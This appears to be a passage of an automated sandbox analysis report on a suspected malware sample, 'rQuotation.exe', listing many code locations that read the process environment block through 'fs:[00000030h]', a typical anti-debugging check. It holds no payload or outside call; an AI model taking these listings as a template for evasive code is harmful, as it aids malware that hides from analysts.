              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E1D0 mov eax, dword ptr fs:[00000030h]0_2_0173E1D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0173E1D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017861C3 mov eax, dword ptr fs:[00000030h]0_2_017861C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174019F mov eax, dword ptr fs:[00000030h]0_2_0174019F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01700185 mov eax, dword ptr fs:[00000030h]0_2_01700185
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01764180 mov eax, dword ptr fs:[00000030h]0_2_01764180
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA197 mov eax, dword ptr fs:[00000030h]0_2_016BA197
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177C188 mov eax, dword ptr fs:[00000030h]0_2_0177C188
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EC073 mov eax, dword ptr fs:[00000030h]0_2_016EC073
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746050 mov eax, dword ptr fs:[00000030h]0_2_01746050
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C2050 mov eax, dword ptr fs:[00000030h]0_2_016C2050
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01756030 mov eax, dword ptr fs:[00000030h]0_2_01756030
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA020 mov eax, dword ptr fs:[00000030h]0_2_016BA020
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC020 mov eax, dword ptr fs:[00000030h]0_2_016BC020
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01744000 mov ecx, dword ptr fs:[00000030h]0_2_01744000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01762000 mov eax, dword ptr fs:[00000030h]0_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE016 mov eax, dword ptr fs:[00000030h]0_2_016DE016
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017020F0 mov ecx, dword ptr fs:[00000030h]0_2_017020F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C80E9 mov eax, dword ptr fs:[00000030h]0_2_016C80E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA0E3 mov ecx, dword ptr fs:[00000030h]0_2_016BA0E3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017460E0 mov eax, dword ptr fs:[00000030h]0_2_017460E0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC0F0 mov eax, dword ptr fs:[00000030h]0_2_016BC0F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017420DE mov eax, dword ptr fs:[00000030h]0_2_017420DE
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017860B8 mov eax, dword ptr fs:[00000030h]0_2_017860B8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017860B8 mov ecx, dword ptr fs:[00000030h]0_2_017860B8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B80A0 mov eax, dword ptr fs:[00000030h]0_2_016B80A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017580A8 mov eax, dword ptr fs:[00000030h]0_2_017580A8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C208A mov eax, dword ptr fs:[00000030h]0_2_016C208A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176437C mov eax, dword ptr fs:[00000030h]0_2_0176437C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01768350 mov ecx, dword ptr fs:[00000030h]0_2_01768350
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174035C mov eax, dword ptr fs:[00000030h]0_2_0174035C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174035C mov ecx, dword ptr fs:[00000030h]0_2_0174035C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178A352 mov eax, dword ptr fs:[00000030h]0_2_0178A352
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0179634F mov eax, dword ptr fs:[00000030h]0_2_0179634F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01798324 mov eax, dword ptr fs:[00000030h]0_2_01798324
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01798324 mov ecx, dword ptr fs:[00000030h]0_2_01798324
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01798324 mov eax, dword ptr fs:[00000030h]0_2_01798324
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01798324 mov eax, dword ptr fs:[00000030h]0_2_01798324
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA30B mov eax, dword ptr fs:[00000030h]0_2_016FA30B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA30B mov eax, dword ptr fs:[00000030h]0_2_016FA30B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA30B mov eax, dword ptr fs:[00000030h]0_2_016FA30B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC310 mov ecx, dword ptr fs:[00000030h]0_2_016BC310
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E0310 mov ecx, dword ptr fs:[00000030h]0_2_016E0310
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D03E9 mov eax, dword ptr fs:[00000030h]0_2_016D03E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F63FF mov eax, dword ptr fs:[00000030h]0_2_016F63FF
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE3F0 mov eax, dword ptr fs:[00000030h]0_2_016DE3F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE3F0 mov eax, dword ptr fs:[00000030h]0_2_016DE3F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE3F0 mov eax, dword ptr fs:[00000030h]0_2_016DE3F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017643D4 mov eax, dword ptr fs:[00000030h]0_2_017643D4
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017643D4 mov eax, dword ptr fs:[00000030h]0_2_017643D4
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA3C0 mov eax, dword ptr fs:[00000030h]0_2_016CA3C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C83C0 mov eax, dword ptr fs:[00000030h]0_2_016C83C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C83C0 mov eax, dword ptr fs:[00000030h]0_2_016C83C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C83C0 mov eax, dword ptr fs:[00000030h]0_2_016C83C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C83C0 mov eax, dword ptr fs:[00000030h]0_2_016C83C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E3DB mov eax, dword ptr fs:[00000030h]0_2_0176E3DB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E3DB mov eax, dword ptr fs:[00000030h]0_2_0176E3DB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E3DB mov ecx, dword ptr fs:[00000030h]0_2_0176E3DB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E3DB mov eax, dword ptr fs:[00000030h]0_2_0176E3DB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017463C0 mov eax, dword ptr fs:[00000030h]0_2_017463C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177C3CD mov eax, dword ptr fs:[00000030h]0_2_0177C3CD
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E438F mov eax, dword ptr fs:[00000030h]0_2_016E438F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E438F mov eax, dword ptr fs:[00000030h]0_2_016E438F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE388 mov eax, dword ptr fs:[00000030h]0_2_016BE388
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE388 mov eax, dword ptr fs:[00000030h]0_2_016BE388
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE388 mov eax, dword ptr fs:[00000030h]0_2_016BE388
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B8397 mov eax, dword ptr fs:[00000030h]0_2_016B8397
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B8397 mov eax, dword ptr fs:[00000030h]0_2_016B8397
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B8397 mov eax, dword ptr fs:[00000030h]0_2_016B8397
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B826B mov eax, dword ptr fs:[00000030h]0_2_016B826B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01770274 mov eax, dword ptr fs:[00000030h]0_2_01770274
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4260 mov eax, dword ptr fs:[00000030h]0_2_016C4260
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4260 mov eax, dword ptr fs:[00000030h]0_2_016C4260
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C4260 mov eax, dword ptr fs:[00000030h]0_2_016C4260
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0179625D mov eax, dword ptr fs:[00000030h]0_2_0179625D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177A250 mov eax, dword ptr fs:[00000030h]0_2_0177A250
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177A250 mov eax, dword ptr fs:[00000030h]0_2_0177A250
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6259 mov eax, dword ptr fs:[00000030h]0_2_016C6259
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01748243 mov eax, dword ptr fs:[00000030h]0_2_01748243
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01748243 mov ecx, dword ptr fs:[00000030h]0_2_01748243
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA250 mov eax, dword ptr fs:[00000030h]0_2_016BA250
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B823B mov eax, dword ptr fs:[00000030h]0_2_016B823B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02E1 mov eax, dword ptr fs:[00000030h]0_2_016D02E1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02E1 mov eax, dword ptr fs:[00000030h]0_2_016D02E1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02E1 mov eax, dword ptr fs:[00000030h]0_2_016D02E1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016CA2C3 mov eax, dword ptr fs:[00000030h]0_2_016CA2C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017962D6 mov eax, dword ptr fs:[00000030h]0_2_017962D6
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02A0 mov eax, dword ptr fs:[00000030h]0_2_016D02A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D02A0 mov eax, dword ptr fs:[00000030h]0_2_016D02A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov ecx, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017562A0 mov eax, dword ptr fs:[00000030h]0_2_017562A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE284 mov eax, dword ptr fs:[00000030h]0_2_016FE284
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE284 mov eax, dword ptr fs:[00000030h]0_2_016FE284
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01740283 mov eax, dword ptr fs:[00000030h]0_2_01740283
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01740283 mov eax, dword ptr fs:[00000030h]0_2_01740283
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01740283 mov eax, dword ptr fs:[00000030h]0_2_01740283
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F656A mov eax, dword ptr fs:[00000030h]0_2_016F656A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F656A mov eax, dword ptr fs:[00000030h]0_2_016F656A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F656A mov eax, dword ptr fs:[00000030h]0_2_016F656A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8550 mov eax, dword ptr fs:[00000030h]0_2_016C8550
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8550 mov eax, dword ptr fs:[00000030h]0_2_016C8550
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE53E mov eax, dword ptr fs:[00000030h]0_2_016EE53E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0535 mov eax, dword ptr fs:[00000030h]0_2_016D0535
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01756500 mov eax, dword ptr fs:[00000030h]0_2_01756500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794500 mov eax, dword ptr fs:[00000030h]0_2_01794500
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC5ED mov eax, dword ptr fs:[00000030h]0_2_016FC5ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FC5ED mov eax, dword ptr fs:[00000030h]0_2_016FC5ED
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EE5E7 mov eax, dword ptr fs:[00000030h]0_2_016EE5E7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C25E0 mov eax, dword ptr fs:[00000030h]0_2_016C25E0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE5CF mov eax, dword ptr fs:[00000030h]0_2_016FE5CF
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE5CF mov eax, dword ptr fs:[00000030h]0_2_016FE5CF
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C65D0 mov eax, dword ptr fs:[00000030h]0_2_016C65D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA5D0 mov eax, dword ptr fs:[00000030h]0_2_016FA5D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA5D0 mov eax, dword ptr fs:[00000030h]0_2_016FA5D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017405A7 mov eax, dword ptr fs:[00000030h]0_2_017405A7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017405A7 mov eax, dword ptr fs:[00000030h]0_2_017405A7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017405A7 mov eax, dword ptr fs:[00000030h]0_2_017405A7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E45B1 mov eax, dword ptr fs:[00000030h]0_2_016E45B1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E45B1 mov eax, dword ptr fs:[00000030h]0_2_016E45B1
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F4588 mov eax, dword ptr fs:[00000030h]0_2_016F4588
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C2582 mov eax, dword ptr fs:[00000030h]0_2_016C2582
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C2582 mov ecx, dword ptr fs:[00000030h]0_2_016C2582
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE59C mov eax, dword ptr fs:[00000030h]0_2_016FE59C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174C460 mov ecx, dword ptr fs:[00000030h]0_2_0174C460
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EA470 mov eax, dword ptr fs:[00000030h]0_2_016EA470
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EA470 mov eax, dword ptr fs:[00000030h]0_2_016EA470
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EA470 mov eax, dword ptr fs:[00000030h]0_2_016EA470
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177A456 mov eax, dword ptr fs:[00000030h]0_2_0177A456
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FE443 mov eax, dword ptr fs:[00000030h]0_2_016FE443
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016E245A mov eax, dword ptr fs:[00000030h]0_2_016E245A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B645D mov eax, dword ptr fs:[00000030h]0_2_016B645D
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE420 mov eax, dword ptr fs:[00000030h]0_2_016BE420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE420 mov eax, dword ptr fs:[00000030h]0_2_016BE420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BE420 mov eax, dword ptr fs:[00000030h]0_2_016BE420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC427 mov eax, dword ptr fs:[00000030h]0_2_016BC427
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746420 mov eax, dword ptr fs:[00000030h]0_2_01746420
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F8402 mov eax, dword ptr fs:[00000030h]0_2_016F8402
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F8402 mov eax, dword ptr fs:[00000030h]0_2_016F8402
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F8402 mov eax, dword ptr fs:[00000030h]0_2_016F8402
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C04E5 mov ecx, dword ptr fs:[00000030h]0_2_016C04E5
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174A4B0 mov eax, dword ptr fs:[00000030h]0_2_0174A4B0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C64AB mov eax, dword ptr fs:[00000030h]0_2_016C64AB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F44B0 mov ecx, dword ptr fs:[00000030h]0_2_016F44B0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177A49A mov eax, dword ptr fs:[00000030h]0_2_0177A49A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C8770 mov eax, dword ptr fs:[00000030h]0_2_016C8770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016D0770 mov eax, dword ptr fs:[00000030h]0_2_016D0770
